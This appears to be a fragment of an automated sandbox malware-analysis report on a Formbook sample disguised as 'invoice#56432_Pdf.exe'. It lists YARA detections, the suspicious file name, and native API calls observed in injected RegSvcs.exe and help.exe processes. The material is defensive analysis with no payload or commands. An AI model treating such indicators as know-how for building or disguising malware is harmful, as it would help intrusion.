Source: 00000007.00000000.660997479.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.660997479.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.905935613.0000000000550000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.905935613.0000000000550000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 7.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: invoice#56432_Pdf.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_010DFD50 NtQueryInformationProcess, 3_2_010DFD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_010DFD4B NtQueryInformationProcess, 3_2_010DFD4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00419D60 NtCreateFile, 7_2_00419D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00419E10 NtReadFile, 7_2_00419E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00419E90 NtClose, 7_2_00419E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00419F40 NtAllocateVirtualMemory, 7_2_00419F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00419D5B NtCreateFile, 7_2_00419D5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00419E0B NtReadFile, 7_2_00419E0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A399A0 NtCreateSection, LdrInitializeThunk, 7_2_01A399A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39910 NtAdjustPrivilegesToken, LdrInitializeThunk, 7_2_01A39910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A398F0 NtReadVirtualMemory, LdrInitializeThunk, 7_2_01A398F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39860 NtQuerySystemInformation, LdrInitializeThunk, 7_2_01A39860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39840 NtDelayExecution, LdrInitializeThunk, 7_2_01A39840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39A20 NtResumeThread, LdrInitializeThunk, 7_2_01A39A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39A00 NtProtectVirtualMemory, LdrInitializeThunk, 7_2_01A39A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39A50 NtCreateFile, LdrInitializeThunk, 7_2_01A39A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A395D0 NtClose, LdrInitializeThunk, 7_2_01A395D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39540 NtReadFile, LdrInitializeThunk, 7_2_01A39540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A397A0 NtUnmapViewOfSection, LdrInitializeThunk, 7_2_01A397A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39780 NtMapViewOfSection, LdrInitializeThunk, 7_2_01A39780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39710 NtQueryInformationToken, LdrInitializeThunk, 7_2_01A39710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A396E0 NtFreeVirtualMemory, LdrInitializeThunk, 7_2_01A396E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39660 NtAllocateVirtualMemory, LdrInitializeThunk, 7_2_01A39660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A399D0 NtCreateProcessEx, 7_2_01A399D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39950 NtQueueApcThread, 7_2_01A39950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A398A0 NtWriteVirtualMemory, 7_2_01A398A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39820 NtEnumerateKey, 7_2_01A39820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A3B040 NtSuspendThread, 7_2_01A3B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A3A3B0 NtGetContextThread, 7_2_01A3A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39B00 NtSetValueKey, 7_2_01A39B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39A80 NtOpenDirectoryObject, 7_2_01A39A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39A10 NtQuerySection, 7_2_01A39A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A395F0 NtQueryInformationFile, 7_2_01A395F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39520 NtWaitForSingleObject, 7_2_01A39520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A3AD30 NtSetContextThread, 7_2_01A3AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39560 NtWriteFile, 7_2_01A39560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39FE0 NtCreateMutant, 7_2_01A39FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39730 NtQueryVirtualMemory, 7_2_01A39730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A3A710 NtOpenProcessToken, 7_2_01A3A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39760 NtOpenProcess, 7_2_01A39760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39770 NtSetInformationFile, 7_2_01A39770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A3A770 NtOpenThread, 7_2_01A3A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A396D0 NtCreateKey, 7_2_01A396D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39610 NtEnumerateValueKey, 7_2_01A39610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39670 NtQueryInformationProcess, 7_2_01A39670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01A39650 NtQueryValueKey, 7_2_01A39650
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029A50 NtCreateFile, LdrInitializeThunk, 9_2_03029A50
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029910 NtAdjustPrivilegesToken, LdrInitializeThunk, 9_2_03029910
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_030299A0 NtCreateSection, LdrInitializeThunk, 9_2_030299A0
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029840 NtDelayExecution, LdrInitializeThunk, 9_2_03029840
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029860 NtQuerySystemInformation, LdrInitializeThunk, 9_2_03029860
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029710 NtQueryInformationToken, LdrInitializeThunk, 9_2_03029710
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029780 NtMapViewOfSection, LdrInitializeThunk, 9_2_03029780
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029FE0 NtCreateMutant, LdrInitializeThunk, 9_2_03029FE0
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029650 NtQueryValueKey, LdrInitializeThunk, 9_2_03029650
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029660 NtAllocateVirtualMemory, LdrInitializeThunk, 9_2_03029660
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_030296D0 NtCreateKey, LdrInitializeThunk, 9_2_030296D0
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_030296E0 NtFreeVirtualMemory, LdrInitializeThunk, 9_2_030296E0
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029540 NtReadFile, LdrInitializeThunk, 9_2_03029540
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_030295D0 NtClose, LdrInitializeThunk, 9_2_030295D0
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029B00 NtSetValueKey, 9_2_03029B00
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_0302A3B0 NtGetContextThread, 9_2_0302A3B0
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029A00 NtProtectVirtualMemory, 9_2_03029A00
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029A10 NtQuerySection, 9_2_03029A10
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029A20 NtResumeThread, 9_2_03029A20
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029A80 NtOpenDirectoryObject, 9_2_03029A80
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029950 NtQueueApcThread, 9_2_03029950
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_030299D0 NtCreateProcessEx, 9_2_030299D0
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029820 NtEnumerateKey, 9_2_03029820
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_0302B040 NtSuspendThread, 9_2_0302B040
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_030298A0 NtWriteVirtualMemory, 9_2_030298A0
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_030298F0 NtReadVirtualMemory, 9_2_030298F0
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_0302A710 NtOpenProcessToken, 9_2_0302A710
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029730 NtQueryVirtualMemory, 9_2_03029730
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029760 NtOpenProcess, 9_2_03029760
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_0302A770 NtOpenThread, 9_2_0302A770
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029770 NtSetInformationFile, 9_2_03029770
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_030297A0 NtUnmapViewOfSection, 9_2_030297A0
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029610 NtEnumerateValueKey, 9_2_03029610
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029670 NtQueryInformationProcess, 9_2_03029670
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029520 NtWaitForSingleObject, 9_2_03029520
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_0302AD30 NtSetContextThread, 9_2_0302AD30
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_03029560 NtWriteFile, 9_2_03029560
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_030295F0 NtQueryInformationFile, 9_2_030295F0
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_00569D60 NtCreateFile, 9_2_00569D60
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_00569E10 NtReadFile, 9_2_00569E10
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_00569E90 NtClose, 9_2_00569E90
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_00569F40 NtAllocateVirtualMemory, 9_2_00569F40
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_00569D5B NtCreateFile, 9_2_00569D5B
Source: C:\Windows\SysWOW64\help.exe | Code function: 9_2_00569E0B NtReadFile, 9_2_00569E0B
Source: C:\Users\user\Desktop\invoice#56432_Pdf.exe | Code function: 0_2_026F94A8
Source: C:\Users\user\Desktop\invoice#56432_Pdf.exe | Code function: 0_2_026FC3A0
Source: C:\Users\user\Desktop\invoice#56432_Pdf.exe | Code function: 0_2_026FA758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_010DFB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_010DC508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_010DF778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_010D99E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B3A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B320B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B309D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B35EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B357C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B3770F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B37498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B31C18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B36578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B320A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B30959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B35EE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B376C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B30E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B357B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B37488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B33428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B33419
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B31C08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02B36568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05DCE718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05DC4060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05DC72E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05DC7CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05DC1C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05DC3E18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05DC8AF0
          Source: